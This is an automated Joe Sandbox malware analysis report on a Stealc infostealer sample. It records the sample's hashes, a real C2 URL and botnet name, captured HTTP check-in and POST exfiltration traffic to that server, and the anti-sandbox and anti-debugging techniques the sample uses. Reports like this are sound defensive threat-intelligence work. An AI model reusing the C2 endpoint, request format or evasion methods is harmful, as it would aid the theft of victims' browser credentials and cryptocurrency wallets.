Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528602
MD5:dcbcbb7abc2724683097cb469b37c429
SHA1:785d9b8ecba52caae4fb1bec9761d5bb1cbff066
SHA256:d9efe6204be6eab5b04dc98ad054b27df5661cba2a11bc508ee27711686eb918
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DCBCBB7ABC2724683097CB469B37C429)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6392JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6392JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.3b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T04:12:02.369390+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.3b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_003BC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003B7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003B9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003B9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003C8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 35 35 33 46 35 31 36 34 34 30 32 32 33 39 31 37 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D242553F51644022391788------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"doma------CBGCAFIIECBFIDHIJKFB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_003B4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 35 35 33 46 35 31 36 34 34 30 32 32 33 39 31 37 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D242553F51644022391788------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"doma------CBGCAFIIECBFIDHIJKFB--
                Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
                Source: file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37s

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB0530_2_006DB053
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074017E0_2_0074017E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077DA300_2_0077DA30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00779AE60_2_00779AE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077EAA20_2_0077EAA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00774A970_2_00774A97
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889BA90_2_00889BA9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00856BC30_2_00856BC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00824CE70_2_00824CE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006834CB0_2_006834CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007805360_2_00780536
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077B51E0_2_0077B51E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3E430_2_006E3E43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066D6240_2_0066D624
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073AFF00_2_0073AFF0
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003B45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gwvifbyy ZLIB complexity 0.9949278137604716
                Source: file.exe, 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003C3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UZWAMF40.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1806336 > 1048576
                Source: file.exeStatic PE information: Raw size of gwvifbyy is bigger than: 0x100000 < 0x192e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gwvifbyy:EW;nlwliywy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gwvifbyy:EW;nlwliywy:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c40e6 should be: 0x1bbeff
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gwvifbyy
                Source: file.exeStatic PE information: section name: nlwliywy
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B889 push esi; mov dword ptr [esp], edi0_2_0081B8C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B889 push eax; mov dword ptr [esp], ecx0_2_0081B8E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CB035 push ecx; ret 0_2_003CB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078705C push 4AF26E12h; mov dword ptr [esp], ebp0_2_007870A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push ebx; mov dword ptr [esp], eax0_2_006DB05D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 3E37D5F5h; mov dword ptr [esp], esi0_2_006DB097
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push edi; mov dword ptr [esp], ebp0_2_006DB109
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 117418E4h; mov dword ptr [esp], edx0_2_006DB114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 2D5EBB59h; mov dword ptr [esp], ecx0_2_006DB121
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push ecx; mov dword ptr [esp], ebp0_2_006DB125
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 288B5101h; mov dword ptr [esp], esi0_2_006DB14C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 0FCA01B2h; mov dword ptr [esp], ebp0_2_006DB1A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB053 push 5A62476Ah; mov dword ptr [esp], eax0_2_006DB26A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630825 push ebp; mov dword ptr [esp], 1A21AB9Bh0_2_0063087B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630825 push ebp; mov dword ptr [esp], eax0_2_0063092A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630825 push ecx; mov dword ptr [esp], 12930B00h0_2_0063097A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AC013 push 050F09E2h; mov dword ptr [esp], edi0_2_007AC03C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008330F7 push esi; mov dword ptr [esp], esp0_2_00833183
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A038 push eax; mov dword ptr [esp], 3F7C1A7Eh0_2_0080A065
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A038 push eax; mov dword ptr [esp], ebp0_2_0080A0D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A038 push 7355BA91h; mov dword ptr [esp], ecx0_2_0080A0F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A038 push 5BE0ED00h; mov dword ptr [esp], ebx0_2_0080A125
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AA0C7 push edi; mov dword ptr [esp], ebx0_2_007AA121
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A28A7 push ebp; mov dword ptr [esp], ebx0_2_007A28CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A28A7 push ecx; mov dword ptr [esp], eax0_2_007A28F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085B861 push ebp; mov dword ptr [esp], ebx0_2_0085B875
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085B861 push ecx; mov dword ptr [esp], 796DEDBBh0_2_0085B8B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FB889 push ecx; mov dword ptr [esp], eax0_2_007FB8B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A0082 push edi; mov dword ptr [esp], edx0_2_007A0010
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074017E push ebx; mov dword ptr [esp], ecx0_2_007401B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082A9AC push ebx; mov dword ptr [esp], esi0_2_0082A9E1
                Source: file.exeStatic PE information: section name: gwvifbyy entropy: 7.95408378221177

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13548
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611A47 second address: 611A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786B24 second address: 786B48 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A53B3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F76A53B3876h 0x00000012 jmp 00007F76A53B3882h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786DF9 second address: 786E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A5412C0Bh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786E0E second address: 786E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A53B3889h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78727C second address: 78729A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jne 00007F76A5412C0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F76A5412C06h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788E2B second address: 788E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F76A53B387Ch 0x00000016 jmp 00007F76A53B3884h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
